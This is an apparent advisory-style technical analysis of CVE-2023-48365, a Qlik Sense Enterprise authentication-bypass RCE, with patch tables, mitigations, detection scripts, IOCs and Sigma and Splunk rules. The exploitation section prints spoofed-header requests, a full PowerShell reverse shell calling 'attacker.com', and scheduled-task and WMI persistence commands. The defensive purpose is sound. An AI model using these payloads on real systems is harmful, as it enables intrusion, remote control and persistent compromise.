Description
Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, and November 2021 Patch 17. NOTE: this issue exists because of an incomplete fix for CVE-2023-41265.
EPSS Score:
24%
Comprehensive Technical Analysis of EUVD-2023-52419 (CVE-2023-48365)
Qlik Sense Enterprise for Windows – Unauthenticated Remote Code Execution (RCE) Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-52419 (CVE-2023-48365) is a critical unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows, stemming from improper HTTP header validation. The flaw allows attackers to bypass authentication, elevate privileges, and execute arbitrary HTTP requests on the backend repository server, leading to full system compromise.
CVSS v3.1 Scoring & Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.6 (Critical) | High impact on confidentiality and integrity with a scope change; consistent with the vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N. |
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network, including from the internet wherever the Qlik proxy is exposed. |
| Attack Complexity (AC) | Low (L) | No special conditions required; the crafted request is repeatable. |
| Privileges Required (PR) | Low (L) | Scored as low rather than none, which sits uneasily with the advisory's "unauthenticated" wording. With PR:N and every other metric unchanged the base score rounds to 10.0, so prioritise as if no privileges were required. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Changed (C) | The request crosses from the proxy into the backend repository service. |
| Confidentiality (C) | High (H) | Full data disclosure possible. |
| Integrity (I) | High (H) | Arbitrary requests against the repository enable complete system manipulation. |
| Availability (A) | None (N) | Not scored, although follow-on code execution can of course be used for disruption. |
Key Observations
- Incomplete Fix for CVE-2023-41265: This vulnerability exists because the patch for the earlier HTTP tunneling flaw (CVE-2023-41265) could be bypassed. Practically, an instance that was "patched" for CVE-2023-41265 is still exploitable unless it is at the patch level listed for CVE-2023-48365; verify the patch level, not merely that a patch was applied.
- High EPSS (24%): The Exploit Prediction Scoring System estimates a 24% probability that exploitation activity is observed within the next 30 days as of the scoring date. EPSS is recomputed daily, so re-check it when prioritising.
- Widespread Deployment: Qlik Sense is widely used in enterprise BI and analytics, making it a high-value target for ransomware, espionage, and data exfiltration.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper validation of HTTP headers, enabling an attacker to:
- Bypass Authentication: Craft malicious HTTP requests to impersonate legitimate users.
- Privilege Escalation via HTTP Tunneling: Exploit the repository service to execute arbitrary HTTP requests on the backend.
- Remote Code Execution (RCE): Leverage the elevated access to deploy malicious payloads (e.g., reverse shells, ransomware, or data exfiltration tools).
Step-by-Step Exploitation Flow
1. Reconnaissance:
   - Identify exposed Qlik Sense instances via Shodan, Censys, or FOFA (e.g., `http.title:"Qlik Sense"`).
   - Check for vulnerable versions: anything below the fixed patch level of its release cycle (August 2023 Patch 2 for the newest affected cycle; see section 3 for the others).
2. Initial Access (Unauthenticated):
   - Send a crafted HTTP request whose headers the proxy fails to validate, so that it is tunnelled to the backend repository as if it had been authenticated. The advisory does not publish the exact header set; `X-Qlik-Session` and `X-Qlik-User` are used throughout this analysis as illustrative identity-carrying headers.
   - The bypass rests on header handling, not on stolen session tokens; no credentials are needed.
3. Privilege Escalation:
   - Use the tunnelled path to reach internal repository endpoints directly.
   - Gain administrative access by issuing backend API calls in the context the repository trusts.
4. Post-Exploitation:
   - Execute arbitrary commands (e.g., PowerShell, CMD, or custom payloads).
   - Exfiltrate sensitive data (dashboards, user credentials, business intelligence reports).
   - Deploy ransomware or persistence mechanisms (e.g., scheduled tasks, WMI subscriptions).
Proof-of-Concept (PoC) Considerations
- Public Research: Praetorian, who reported the original "ZeroQlik" flaws, published a write-up of this fix bypass under the name "DoubleQlik". Treat the technique as public knowledge.
- In-the-Wild Exploitation: Arctic Wolf reported the Cactus ransomware operation exploiting the Qlik Sense flaws in November 2023; the high EPSS reflects that history, not merely speculative interest.
- Framework Modules: Whether a Metasploit or Cobalt Strike module exists should be checked against the current module index rather than assumed.
- Relationship to CVE-2023-41265: This is the bypass of that fix, not an independent bug to chain with it. An instance patched only for CVE-2023-41265 remains exploitable.
3. Affected Systems & Software Versions
Vulnerable Versions
| Release Cycle | Vulnerable Versions | Fixed Versions |
|---|---|---|
| August 2023 | All versions before Patch 2 | August 2023 Patch 2 |
| May 2023 | All versions before Patch 6 | May 2023 Patch 6 |
| February 2023 | All versions before Patch 10 | February 2023 Patch 10 |
| November 2022 | All versions before Patch 12 | November 2022 Patch 12 |
| August 2022 | All versions before Patch 14 | August 2022 Patch 14 |
| May 2022 | All versions before Patch 16 | May 2022 Patch 16 |
| February 2022 | All versions before Patch 15 | February 2022 Patch 15 |
| November 2021 | All versions before Patch 17 | November 2021 Patch 17 |
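As an added example (not Qlik tooling and not from the original page), the following Python turns the table above into a fleet check. It assumes the version is known in the advisory's own naming, `<Month> <Year> Patch <n>`, with an initial release that has no patch suffix treated as Patch 0; translating Qlik's numeric build strings into a release cycle is deployment-specific and left out. Treating cycles older than November 2021, which the advisory does not list, as vulnerable is an assumption of this example.

```python
"""Check a Qlik Sense Enterprise for Windows release against the fixed patch
levels for CVE-2023-48365. Added example, not Qlik tooling.

Assumes versions are given as '<Month> <Year> Patch <n>' (advisory naming).
"""
import re

# Minimum patch level containing the fix, per release cycle (from the advisory).
FIXED_PATCH = {
    ("August", 2023): 2,
    ("May", 2023): 6,
    ("February", 2023): 10,
    ("November", 2022): 12,
    ("August", 2022): 14,
    ("May", 2022): 16,
    ("February", 2022): 15,
    ("November", 2021): 17,
}

# Qlik ships four release cycles a year; used only to order cycles chronologically.
CYCLE_ORDER = {"February": 1, "May": 2, "August": 3, "November": 4}
LAST_AFFECTED_CYCLE = (2023, CYCLE_ORDER["August"])

_RELEASE_RE = re.compile(
    r"^\s*([A-Za-z]+)\s+(\d{4})(?:\s+Patch\s+(\d+))?\s*$", re.IGNORECASE
)


def parse_release(text):
    """Return (month, year, patch) from e.g. 'May 2023 Patch 4'.

    A release with no 'Patch n' suffix is the initial release, patch 0.
    """
    m = _RELEASE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised release string: {text!r}")
    month = m.group(1).capitalize()
    if month not in CYCLE_ORDER:
        raise ValueError(f"unknown release cycle: {month!r}")
    return month, int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable(text):
    """True if the installation lacks the CVE-2023-48365 fix.

    - Listed cycles: vulnerable when below the fixed patch level.
    - Cycles after August 2023: shipped with the fix, not vulnerable.
    - Cycles before November 2021: not in the advisory; assumed vulnerable
      (out of support, no fix listed). This is an assumption, not vendor data.
    """
    month, year, patch = parse_release(text)
    fixed = FIXED_PATCH.get((month, year))
    if fixed is not None:
        return patch < fixed
    cycle = (year, CYCLE_ORDER[month])
    if cycle > LAST_AFFECTED_CYCLE:
        return False
    return True


def triage(versions):
    """Map each version string to 'vulnerable' or 'fixed' for a fleet report."""
    return {v: ("vulnerable" if is_vulnerable(v) else "fixed") for v in versions}


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    inventory = [
        "August 2023 Patch 1", "August 2023 Patch 2", "May 2022 Patch 16",
        "November 2022", "February 2024", "February 2021 Patch 9",
    ]
    for ver, state in triage(inventory).items():
        print(f"{ver:28s} {state}")
```

Feed it the release names from your CMDB or from the Qlik Management Console's "About" dialog; anything it reports as `vulnerable` needs the patch for its own cycle, not a cross-cycle upgrade decision made on the fly.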
Deployment Scenarios at Risk
- On-Premises Qlik Sense Enterprise (Windows-based deployments).
- Hybrid Cloud Environments where Qlik Sense integrates with AWS, Azure, or GCP.
- Third-Party Integrations (e.g., SAP, Salesforce, or custom APIs) that rely on Qlik’s authentication.
4. Recommended Mitigation Strategies
Immediate Actions (Critical Priority)
- Apply Patches Immediately:
  - Upgrade to the fixed patch for your release cycle (August 2023 Patch 2 or later on the current line; older cycles have their own fixed patch levels, listed in section 3). Confirm the patch level after deployment, since this CVE is itself a bypass of an earlier patch.
  - If unable to patch, isolate Qlik Sense servers from untrusted networks.
- Network-Level Protections:
  - Restrict Access: Use firewalls, VPNs, or zero-trust policies so that the Qlik Sense Proxy is not reachable from the internet.
  - WAF / Reverse Proxy Rules: Strip or block client-supplied `X-Qlik-*` headers at the edge. Only a trusted reverse proxy in front of a header-authentication virtual proxy should ever set them.
  - IPS/IDS Signatures: Monitor for exploitation attempts (e.g., unusual HTTP tunneling patterns and identity headers arriving from external sources).
- Authentication & Authorization Hardening:
  - Enable Multi-Factor Authentication (MFA) at the identity provider for all Qlik Sense users. This does not stop the unauthenticated bypass itself, but it limits what harvested credentials are worth afterwards.
  - Review and restrict repository API access to least-privilege principles.
  - Rotate all credentials (service accounts, API keys, and certificates where compromise is suspected) post-patch.
- Monitoring & Detection:
  - SIEM Alerts: Alert on unusual HTTP request patterns, e.g., repeated `401`/`403` responses from one source followed by a success.
  - Endpoint Detection & Response (EDR): Monitor for unexpected child processes (`cmd.exe`, `powershell.exe`) of the Qlik Sense service processes.
  - Log Analysis: Review Qlik Sense logs (`C:\ProgramData\Qlik\Sense\Log\`) for suspicious activity.
Long-Term Security Recommendations
- Regular Vulnerability Scanning: Use Nessus, Qualys, or OpenVAS to detect unpatched instances.
- Segmentation: Isolate Qlik Sense servers in a dedicated VLAN with strict access controls.
- Incident Response Plan: Develop a playbook for Qlik Sense compromises, including forensic analysis and containment procedures.
- Vendor Communication: Subscribe to Qlik’s security advisories for future vulnerabilities.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Risks
- GDPR Violation Risk: Unauthorized access to BI dashboards containing PII could lead to heavy fines (up to 4% of global revenue).
- NIS2 Directive: Essential and important entities (e.g., finance, healthcare, energy) using Qlik Sense must send an early warning within 24 hours of becoming aware of a significant incident and a full incident notification within 72 hours.
- DORA (Digital Operational Resilience Act): Financial institutions must ensure third-party risk management, including BI tools like Qlik.
Threat Actor Interest
- Ransomware Groups: Exploitation of the Qlik Sense flaws by the Cactus ransomware operation was reported by Arctic Wolf in November 2023. BI servers are attractive targets because they hold consolidated business data ready for exfiltration and extortion.
- APT Groups: No state-sponsored exploitation of this CVE is documented in the sources this analysis draws on; attribution to specific APT groups would be speculation.
- Initial Access Brokers (IABs): Likely to sell access to compromised Qlik instances on criminal forums.
Geopolitical & Sector-Specific Risks
- Critical Infrastructure: Energy, healthcare, and government sectors across Europe (Germany, France, and the UK among the largest deployments) are at elevated risk wherever instances are internet-exposed.
- Supply Chain Attacks: Compromised Qlik instances could be used to pivot into connected ERP/CRM systems (e.g., SAP, Salesforce).
- EU-Wide Threat: Given Qlik’s widespread adoption in EU enterprises, this vulnerability could lead to large-scale data breaches.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: Improper validation of HTTP headers that lets a request be tunnelled past the proxy's authentication to the backend. The mechanism is closer to HTTP request smuggling/tunneling (CWE-444) than to plain Improper Authentication (CWE-287), although the effect is an authentication bypass.
- Affected Component: The request path from the Qlik Sense Proxy Service (QPS), which terminates client HTTP and enforces authentication, into the Qlik Sense Repository Service (QRS), the backend the advisory calls "the repository application".
- Incomplete Fix for CVE-2023-41265: The first patch did not close every variant of the header manipulation, so the tunnelling path remained reachable.
Exploitation Technical Deep Dive
- HTTP Header Manipulation:
  - The attacker sends a request carrying identity or session headers that the proxy should only honour from trusted internal sources. The advisory does not publish the exact header set; the header names below are illustrative, and the traversal-style session value is a placeholder rather than a known-working payload.
  - Example (illustrative request, not a documented exploit; `/api/v1/users` is likewise a placeholder, the real QRS API lives under `/qrs/`):
```http
GET /api/v1/users HTTP/1.1
Host: qlik-sense-server
X-Qlik-Session: ../../../../../admin
X-Qlik-User: admin
```
  - Because the headers are not validated, the request is forwarded to the backend as though authentication had succeeded.
- HTTP Tunneling for RCE:
  - Once the request reaches the repository, the attacker uses the tunnelled access to call internal endpoints. The `/api/v1/reloads` endpoint and the `script` field below are illustrative; this analysis does not document which repository function was abused for code execution. The payload itself is a generic PowerShell TCP reverse shell.
```http
POST /api/v1/reloads HTTP/1.1
Host: qlik-sense-server
X-Qlik-Session: [SPOOFED_SESSION]
Content-Type: application/json

{ "script": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" }
```
- Post-Exploitation Persistence (generic Windows techniques, not specific to Qlik):
  - Scheduled Tasks:
```cmd
schtasks /create /tn "QlikBackdoor" /tr "powershell -ep bypass -c <malicious_script>" /sc minute /mo 5
```
  - WMI Event Subscriptions. The filter below is only one of the three objects a working subscription needs; without a matching `__EventConsumer` and `__FilterToConsumerBinding` it triggers nothing, so hunt for all three classes under `root\subscription`:
```cmd
wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="QlikTrigger", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
```
  - Registry Modifications: Adding malicious DLLs under `HKEY_LOCAL_MACHINE\SOFTWARE\Qlik\Sense\Settings\7\Extensions`. This key path has not been verified against a live installation, so audit the whole `HKLM\SOFTWARE\Qlik\Sense` tree rather than that one key.
Forensic Indicators of Compromise (IOCs)
| Indicator Type | Example |
|---|---|
| Network | Identity headers (`X-Qlik-User`, `X-Qlik-Session`) arriving from sources other than the trusted reverse proxy; unusual POST requests with large bodies against repository endpoints (the `/api/v1/reloads` path used above is illustrative; the real QRS API lives under `/qrs/`). |
| Log Files | `C:\ProgramData\Qlik\Sense\Log\Repository\Trace\` and `C:\ProgramData\Qlik\Sense\Log\Proxy\Trace\`: look for failed authentication attempts from one source followed by successful privileged access. |
| Process Execution | `powershell.exe` or `cmd.exe` spawned by a Qlik Sense service process (`Repository.exe`, `Proxy.exe`, `Engine.exe`, `Scheduler.exe`). |
| File System | Unexpected `.ps1`, `.bat`, or `.dll` files under `C:\ProgramData\Qlik\Sense\`, in particular newly added extensions. |
| Registry | Unauthorized changes under `HKEY_LOCAL_MACHINE\SOFTWARE\Qlik\Sense\`. |
Detection & Hunting Queries
- Splunk (the field names `src_ip`, `user`, `http_method`, `uri_path` assume a normalised proxy/web sourcetype; adjust to your ingestion):
```
index=qlik sourcetype=qlik:repository
| search "X-Qlik-Session" OR "X-Qlik-User"
| stats count by src_ip, user, http_method, uri_path
| where count > 5
```
- Sigma Rule (`cs-headers` is a placeholder field; map it to whatever field your log source stores request headers in. A legitimate header-authentication reverse proxy will match the `X-Qlik-User` pattern and should be allowlisted by source address):
```yaml
title: Suspicious Qlik Sense HTTP Header Manipulation
id: 00000000-0000-4000-8000-000000000000   # placeholder, replace with a freshly generated UUIDv4
status: experimental
description: Detects potential CVE-2023-48365 exploitation via HTTP header injection.
references:
  - https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/tac-p/2120510
author: EUVD Analyst
date: 2025/01/13
logsource:
  category: webserver
  product: qlik_sense
detection:
  selection:
    cs-headers|contains:
      - 'X-Qlik-Session: ../../'
      - 'X-Qlik-User: admin'
  condition: selection
falsepositives:
  - Legitimate administrative activity
  - Header authentication virtual proxies legitimately receive X-Qlik-User from a trusted reverse proxy
level: high
```
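The SIEM and EDR bullets in section 4 and the hunting queries above both describe the same two signals: identity headers arriving from an untrusted source, and a burst of authentication failures from one source that ends in a success. The following Python is an added example (not Qlik tooling and not from the original page) that runs both checks over a constructed log. The log format is an assumption of the example: one JSON object per line with `src_ip`, `method`, `path`, `status` and `headers`; real Qlik Proxy audit logs have to be normalised into that shape first, and the trusted proxy range `10.0.0.0/8` is likewise assumed.

```python
"""Hunting helper for the two signals this page describes:
 1. client-supplied X-Qlik-* identity headers from untrusted sources, and
 2. a burst of 401/403 responses from one source followed by a success.

Added example, not Qlik tooling. The log format is constructed: one JSON
object per line with src_ip, method, path, status and headers. Real Qlik
Proxy audit logs must be normalised into this shape first; the field names
are an assumption of this example.
"""
import json
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Only a trusted reverse proxy should ever inject identity headers.
# Assumption for this example: the trusted proxy sits in 10.0.0.0/8.
TRUSTED_HEADER_SOURCES = [ip_network("10.0.0.0/8")]
IDENTITY_HEADERS = ("x-qlik-user", "x-qlik-session")
FAIL_THRESHOLD = 3  # consecutive 401/403 before a success is suspicious

# Constructed sample log (not real traffic). Time order is top to bottom.
SAMPLE_LOG = r"""
{"src_ip": "10.1.2.3", "method": "GET", "path": "/hub", "status": 200, "headers": {"X-Qlik-User": "UserDirectory=CORP; UserId=alice"}}
{"src_ip": "203.0.113.7", "method": "GET", "path": "/qrs/user", "status": 401, "headers": {}}
{"src_ip": "203.0.113.7", "method": "GET", "path": "/qrs/user", "status": 401, "headers": {"X-Qlik-Session": "../../../../../admin"}}
{"src_ip": "203.0.113.7", "method": "GET", "path": "/qrs/user", "status": 403, "headers": {}}
{"src_ip": "203.0.113.7", "method": "POST", "path": "/qrs/about", "status": 200, "headers": {"X-Qlik-User": "UserDirectory=INTERNAL; UserId=sa_repository"}}
{"src_ip": "198.51.100.9", "method": "GET", "path": "/hub", "status": 200, "headers": {}}
"""


def parse_log(text):
    """Parse JSON-lines into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _from_trusted_proxy(ip):
    addr = ip_address(ip)
    return any(addr in net for net in TRUSTED_HEADER_SOURCES)


def spoofed_header_events(events):
    """Requests carrying X-Qlik-* identity headers from a source that is not
    the trusted reverse proxy. Header names are matched case-insensitively."""
    hits = []
    for e in events:
        names = {k.lower() for k in e.get("headers", {})}
        present = [h for h in IDENTITY_HEADERS if h in names]
        if present and not _from_trusted_proxy(e["src_ip"]):
            hits.append((e["src_ip"], e["path"], present))
    return hits


def auth_failure_then_success(events, threshold=FAIL_THRESHOLD):
    """Sources that accumulate >= threshold consecutive 401/403 responses and
    then receive a 2xx: the shape of a bypass attempt that eventually lands.
    Any non-failure status resets the streak for that source."""
    streak = defaultdict(int)
    hits = []
    for e in events:
        ip, status = e["src_ip"], e["status"]
        if status in (401, 403):
            streak[ip] += 1
        else:
            if 200 <= status < 300 and streak[ip] >= threshold:
                hits.append((ip, streak[ip], e["path"]))
            streak[ip] = 0
    return hits


def hunt(text=SAMPLE_LOG):
    """Run both checks and return the findings keyed by signal name."""
    events = parse_log(text)
    return {
        "spoofed_headers": spoofed_header_events(events),
        "fail_then_success": auth_failure_then_success(events),
    }


if __name__ == "__main__":
    for name, rows in hunt().items():
        print(name)
        for row in rows:
            print("  ", row)
```

On the sample, the trusted proxy's `X-Qlik-User` on the first line is not reported, the two header-bearing requests from `203.0.113.7` are, and the same source's three failures followed by a 200 against `/qrs/about` trip the second check. Tune `FAIL_THRESHOLD` and the trusted ranges per environment before alerting on it.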
Conclusion & Strategic Recommendations
Key Takeaways
- Critical RCE Vulnerability: EUVD-2023-52419 poses a severe risk to organizations using unpatched Qlik Sense Enterprise.
- Exploitation Likely: Given the high EPSS (24%) and the reported in-the-wild exploitation by ransomware operators, treat any unpatched instance as already targeted.
- Regulatory & Financial Risks: Non-compliance with GDPR, NIS2, and DORA could result in significant penalties.
Strategic Recommendations for CISOs & Security Teams
- Patch Management: Immediately deploy Qlik’s August 2023 Patch 2 (or later) across all instances.
- Zero Trust Implementation: Restrict Qlik Sense access to authenticated, MFA-protected users only.
- Threat Hunting: Proactively hunt for IOCs using SIEM, EDR, and network traffic analysis.
- Incident Response Readiness: Update IR playbooks to include Qlik Sense compromises.
- Vendor Risk Assessment: Audit third-party BI tools for similar vulnerabilities.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | High | Low complexity, unauthenticated access. |
| Impact | Critical | Full system compromise, data exfiltration, ransomware. |
| Likelihood | High | EPSS 24%, active threat actor interest. |
| Mitigation Feasibility | Medium | Patching is straightforward, but legacy systems may lag. |
| Overall Risk | Critical (9.6/10) | Immediate action required. |
Next Steps:
- Patch all Qlik Sense instances within 72 hours.
- Conduct a full security audit of BI and analytics tools.
- Monitor for exploitation attempts via SIEM and EDR alerts.
For further assistance, consult Qlik’s official security advisory or engage a third-party penetration testing firm for validation.